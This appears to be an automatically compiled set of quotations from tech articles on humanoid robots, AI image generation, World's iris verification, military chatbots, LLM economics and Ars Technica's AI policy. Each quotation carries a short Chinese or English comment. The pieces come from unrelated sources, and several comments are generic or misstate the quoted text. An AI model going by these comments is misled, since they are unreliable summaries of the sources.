这一重要的相关工作引用强调了UniT在将人类数据无缝转换为增强的人形机器人动作可控性方面的作用,为未来人形机器人视频生成提供了新的思路。
By predicting these unified tokens, it effectively leverages diverse human data to achieve state-of-the-art data efficiency and robust out-of-distribution (OOD) generalization.
这一实验结果展示了UniT在利用人类数据实现高效和鲁棒泛化方面的潜力,为数据效率和泛化能力提供了新的标准。
Scaling humanoid foundation models is bottlenecked by the scarcity of robotic data.
这一观点挑战了当前人形机器人模型发展的瓶颈,即缺乏机器人数据,为未来研究方向提供了启示。
We look at reference classes, factory buildout timelines, and upstream component supply to estimate plausible production rates for humanoids, quadrupeds, robotic arms, wheeled robots, and drones.
该研究通过参考类别、工厂建设时间表和上游组件供应来估算人形机器人、四足机器人、机械臂、轮式机器人和无人机的可能生产率,这一方法提出了一个创新的评估框架。
We make products, tools, and datasets available to everyone with the goal of building a more collaborative ecosystem.
初学者应关注如何通过提供产品、工具和数据集来构建更协作的研究生态系统。
Publishing our work allows us to share ideas and work collaboratively to advance the field of computer science.
初学者需要认识到,分享研究成果是推动计算机科学领域进步的关键。
We regularly open-source projects with the broader research community and apply our developments to Google products.
初学者应学习如何将研究成果开放给社区,并应用于实际产品中,这是促进研究发展的关键。
Our researchers drive advancements in computer science through both fundamental and applied research.
初学者应理解基础研究和应用研究在推动计算机科学进步中的同等重要性。
We strive to create an environment conducive to many different types of research across many different time scales and levels of risk.
初学者可能容易忽略不同类型研究的重要性,以及不同时间尺度和风险水平对研究环境的影响。
This richly layered collage poster features art, science, history, design, and global culture surrounding the phrase “Create Everything at Once,” blending planets, anatomy sketches, maps, architecture, symbols, crystals, and mixed media imagery into a vibrant creative mosaic.
文章展示了ChatGPT Images 2.0的多样性和创造力,但需要了解这种多样性是否能够满足不同用户的需求。
Greater precision and control
该表述可能带有偏见,需要了解“Greater precision and control”是如何实现的,以及用户对此的评价。
This poster-style image introduces “ChatGPT Images 2.0” with a bold editorial layout, blocks of explanatory text, and geometric shapes in red, black, blue, and yellow.
描述了ChatGPT Images 2.0的图像风格,需要核查这种风格是否是用户指定还是系统自动生成的。
A new era of image generation
文章的核心论点是ChatGPT Images 2.0代表了图像生成的新时代,这可能需要进一步了解该技术如何改变现有的图像生成方式。
These innovations are designed to achieve a 73% reduction in per-token inference FLOPs and a 90% reduction in KV cache memory burden compared with DeepSeek-V3.2.
This highlights the significant performance improvements in the V4 architecture over its predecessor, which is crucial for understanding the benefits of upgrading.
We’ve lost the moral compass for what we invest into
我们已经失去了对投资方向的价值指南。
There is an aspect of entrepreneurship where you’re rewarded for selling a vision of what could be, and it doesn’t always get realized.
创业精神的一个方面是,你因为推销一个可能成为现实的想法而得到奖励,但并不总是能实现。
The true founders—not the ones who want to make a lot of money or do it because their roommates want to do it—are closer to artists than to any other profession.
真正的创始人——不是那些想要赚很多钱或者因为室友想这么做的人——更接近艺术家,而不是其他任何职业。
For Silicon Valley investors, sorting out the students who can make it big from the wannabes has become a high-stakes competition.
硅谷投资者将识别出能够成功的学生与有抱负者之间的竞争,已经变成了一场高风险的竞赛。
These teenagers are sometimes handed “pre-idea funding”—hundreds of thousands of dollars, or in rare cases, even millions—before they have the glimmer of an actual company in mind.
令人震惊的是,一些年轻人在连实际公司构想都没有的情况下,就得到了数十万美元甚至数百万美元的“预想法”资金。
Even with that, World has had trouble getting buy-in from the general public, and rightfully so. Trusting your biometrics to any third party seems like a mistake (just look at how well third-party verification services have handled the sensitive data entrusted to them for age-assurance checks).
This statement expresses a critical view of the technology, suggesting that public trust is a significant barrier, and it references past issues with third-party verification services, which could be a point of concern for readers.
The company reportedly has about 18 million verified users thus far, but many of them are people in developing nations who signed up because of the promise of Worldcoin, a cryptocurrency that has seemingly fallen out of World’s plans.
This statement raises questions about the demographics of the users and the sustainability of the verification process, especially in relation to the promised cryptocurrency.
The company is pitching itself as a potential solution to ticket scalping, and announced that it has built software called Concert Kit that ticketers can use to ensure only real people and not scalper bots are purchasing tickets.
This suggests a new application of the technology, but it doesn't provide evidence that the technology is effective against scalper bots, which is a significant claim.
World has already been working with Tinder and ran a pilot of the verification process in Japan. It was apparently enough of a success that Tinder will roll out the authentication method globally.
The success of the pilot in Japan is mentioned, but it's not clear what metrics were used to determine success, which could be a point of contention.
According to a press release, users will be required to undergo World’s verification method, which requires having their eyeballs scanned at a physical location with a proprietary device to prove they are human.
This quote highlights a significant requirement for users, which may raise concerns about privacy and the feasibility of such a process.
Sam Altman is banking on people being willing to surrender scans of their eyes in order to authenticate themselves
This statement suggests a reliance on user acceptance of a potentially invasive technology, which may be an overestimate of public willingness or a speculative assumption.
And it’s not just the US putting chatbots at commanders’ fingertips; China is commissioning similar tools, according to recent [analysis] by Georgetown University’s Center for Security and Emerging Technology.
需要核查的是,中国是否真的在开发类似的聊天机器人工具,以及这些工具的具体应用情况。
Today’s military personnel might give chatbots a list of potential targets to help decide which to strike first.
这个陈述需要核查的是,目前军事人员是否真的在实战中使用聊天机器人来决定攻击目标。
Algorithms that scour hours of surveillance footage and pick out, say, trucks with mounted machine guns date back to the war in Afghanistan.
需要核查的是,是否所有用于阿富汗战争中的算法都是基于AI技术,以及这些算法的具体应用和效果。
The transition from isolated AI models to the aggregated, metered token economy will unlock the twenty-first.
作者预测,从孤立的AI模型到聚合的、计量的token经济的转变将开启21世纪的新篇章。
This dynamic forces a brutal new discipline in how enterprises deploy capital and architect their internal workflows.
这种动态迫使企业以全新的方式部署资本和架构内部工作流程,表明了人工智能对企业管理方式的深远影响。
Consider the deep anatomy of an individual AI session to understand how this telemetry actually works in practice.
作者呼吁深入理解单个AI会话的内部结构,以便更好地理解人工智能的使用和度量。
A token is the fundamental, indivisible unit of cognitive work. It is the exact equivalent of the kilowatt-hour for the artificial intelligence grid.
作者提出了‘token’作为人工智能认知工作的基本单位,这一概念具有革命性,它将抽象的人工智能转化为可度量的资源。
The grid standardized power. It violently divorced the complex generation of electricity from its seamless consumption.
作者将电力网格的标准化与人工智能的标准化进行类比,暗示了人工智能领域将经历类似的变革。
The smartest companies are no longer just hiring talent; they are purchasing synthetic intelligence by the gigawatt.
这一观点揭示了智能公司正在从传统的人力资源管理转向购买合成智能,这表明了人工智能作为一种新型资源的崛起。
The smartest companies are no longer just hiring talent; they are purchasing synthetic intelligence by the gigawatt.
这一观点指出,未来企业竞争的关键不再是仅仅招聘人才,而是购买强大的合成智能,这预示着人工智能在企业发展中的核心地位。
Maintaining the standards in this policy is a shared obligation across our editorial operation.
这一声明强调了在编辑团队中维护政策标准的共同责任,体现了集体承诺和团队协作的重要性。
We do not publish AI-generated images, audio, or video as authentic documentation of real events.
这条规定指出Ars Technica不会将人工智能生成的图像、音频或视频作为真实事件的证明,体现了对真实性的坚持。
Anyone who uses AI tools in our editorial workflow is responsible for the accuracy and integrity of the resulting work.
这一规定表明Ars Technica对使用人工智能工具的人员有明确的责任要求,强调了准确性和完整性。
These standards have governed our editorial work since AI tooling became available.
这一声明强调了Ars Technica在人工智能工具可用之前就制定了这些标准,表明其对新闻编辑的重视。
We don’t publish claims based solely on AI-generated summaries, and reporters may not represent any material as “reviewed” unless they have examined it directly.
这条规定表明Ars Technica对基于人工智能生成的总结持怀疑态度,强调了记者直接审查信息的重要性。
Ars Technica is written by humans. Our reporting, analysis, and commentary are human-authored.
这篇政策声明强调了Ars Technica坚持人工写作的原则,质疑了人工智能在新闻报道和分析中的潜在作用。
We do not publish AI-generated images, audio, or video as authentic documentation of real events
需要探讨AI生成内容在新闻报道中的伦理和法律问题。
Reporters may use AI tools vetted and approved for our workflow to assist with research
需要了解哪些AI工具被批准用于研究,以及这些工具如何辅助记者进行研究。
Our reporting, analysis, and commentary are human-authored
强调人类作者的独特性,需要了解AI在辅助报道、分析和评论方面的具体应用。
AI cannot replace human insight, creativity, and ingenuity
文章的核心论点之一,需要进一步了解AI在新闻业中的具体应用及其对人类工作的影响。
The issue for many people isn’t the technology itself (though there are many ethical issues in how it was trained). The issue is the stupid state of our capitalist system, and the weird way companies are trying to force it down everyone’s throats.
作者提出了一个非共识观点,认为LLM技术本身并不是问题,而是资本主义体系的问题以及公司如何强制推广这项技术。
They also have the benefits of running on hardware that’s sipping power most of the time, rather than slurping it down in massive data centres.
本地LLM的优势在于它们在大多数时间消耗较少的电力,这可能会降低运营成本并减少对大型数据中心的需求。
It’s already possible to run LLMs on local hardware, and that’s only going to get easier in the future.
这一观点预示着LLM的本地化趋势,这可能会对依赖云服务的LLM公司构成挑战。
OpenAI in particular [has raised over $290 billion dollars of investment](https://www.owler.com/company/openai/funding), and has not yet turned a profit.
这个数据点强调了OpenAI巨大的资金投入与盈利能力之间的脱节,引发了对LLM公司未来可持续性的担忧。
Anthropic’s Head of Growth, Amol Avasare, said [this was caused by a “test” gone slightly wrong](https://x.com/TheAmolAvasare/status/2046788872517066971). Apparently only 2% of users were supposed to see the new pricing page.
这个例子揭示了大型语言模型(LLM)定价策略的不稳定性,以及这些公司如何轻易地改变价格,这可能会让消费者感到困惑。
We've automated ourselves into Goodhart's law.
作者引用了Goodhart's law,指出我们通过自动化自己进入了这条定律的范畴,这是一个值得记录的重要信息。
The incentives almost guarantee we are in big trouble. Many workers, quite rationally, want to do well on whatever dimension they are being measured on. If they are judged by the surface-level quality of their work, then it's no surprise most of 'their' output will be written by LLMs.
作者认为,当前的激励机制几乎保证了我们会遇到大麻烦,因为许多工人会合理地追求他们在被衡量方面的表现,这可能导致大量输出由LLMs完成。
Large language models are great at simulating a style of writing without necessarily reproducing the quality of the work.
这个观点揭示了大型语言模型在模仿写作风格方面的能力,但并不一定能够复制工作质量,这是一个反直觉的观点。
All of knowledge work has this problem. It's hard to objectively judge the quality of someone's work without spending a lot of effort on it. Therefore everyone relies heavily on proxy measures.
作者指出,知识工作中普遍存在的问题是无法客观判断工作质量,因此人们依赖于代理指标,这是一个非共识观点。
You've received a report, a market analysis for the new product you're planning to launch. Reading through it you notice problems: the date on the report doesn't match the date you requested it on, it's from 6 months prior. Several paragraphs have obvious spelling errors. Some graphs are mislabeled and duplicated.
这个例子展示了我们如何通过表面的质量来评判工作质量,而这个质量并不总是代表实际的工作质量。
Critics called the manifesto [fascist](https://bsky.app/profile/gilduran.com/post/3mjwqsyj54s2a)
The label 'fascist' applied to the manifesto by critics suggests a strong negative perception of the company's political stance.
But for employees, the culture shift feels intentional. ‘I don’t want to assert that I have knowledge of what’s going on in their internal mind,’ one former worker tells WIRED. ‘But maybe it's gotten to a place where encouraging independent thought and questioning leads to some bad conclusions.’
This quote reflects a concern among employees about the company culture and its potential impact on independent thinking.